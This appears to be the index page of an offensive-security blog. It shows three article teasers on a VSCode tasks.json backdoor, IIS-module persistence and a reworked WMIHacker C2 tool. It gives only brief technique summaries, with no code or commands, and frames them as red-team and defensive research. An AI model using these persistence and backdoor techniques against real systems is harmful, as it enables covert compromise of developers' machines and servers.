Welcome to s0ld13r.kz

DISCLAIMER: This article is intended strictly for educational and research purposes. The techniques, tools, and concepts discussed here are designed to enhance understanding of adversary tactics, improve defensive capabilities, and support authorized Red Team assessments. Any unauthorized or malicious use of the information provided is strongly condemned and may be illegal. Intro Do you remember the VSCode task backdoor ? The core idea was simple: you can’t blindly trust projects you open in your editor. An attacker could embed a surprise in .vscode/tasks.json, and the moment you trusted the workspace, a loader would silently fire in the background and your machine will be compromised. This technique was weaponized by DPRK affilated Lazarus group in their campaigns against IT companies. ...

DISCLAIMER: This article is intended strictly for educational and research purposes. The techniques, tools, and concepts discussed here are designed to enhance understanding of adversary tactics, improve defensive capabilities, and support authorized Red Team assessments. Any unauthorized or malicious use of the information provided is strongly condemned and may be illegal. Intro While studying APT and Red Team materials, I came across an excellent article from CICADA8 about establishing persistence in infrastructure through IIS modules instead of classic webshells. ...

DISCLAIMER: This article is intended strictly for educational and research purposes. The techniques, tools, and concepts discussed here are designed to enhance understanding of adversary tactics, improve defensive capabilities, and support authorized Red Team assessments. Any unauthorized or malicious use of the information provided is strongly condemned and may be illegal. Table of Contents Introduction Earth Kurma Chain Symmetric & Asymmetric approach in C2 infra Symmetric C2 Asymmetric C2 WMIHacker 2.0 MITRE ATT&CK mapping Detection & Response Conclusion Introduction In this article, I will present a reimagined version of the WMIHacker tool, which has been observed in APT campaigns attributed to the EARTH KURMA group. The revamped version focuses on advanced command and control (C2) techniques and demonstrates how both symmetric and asymmetric C2 infrastructures can be leveraged in real-world attack scenarios. ...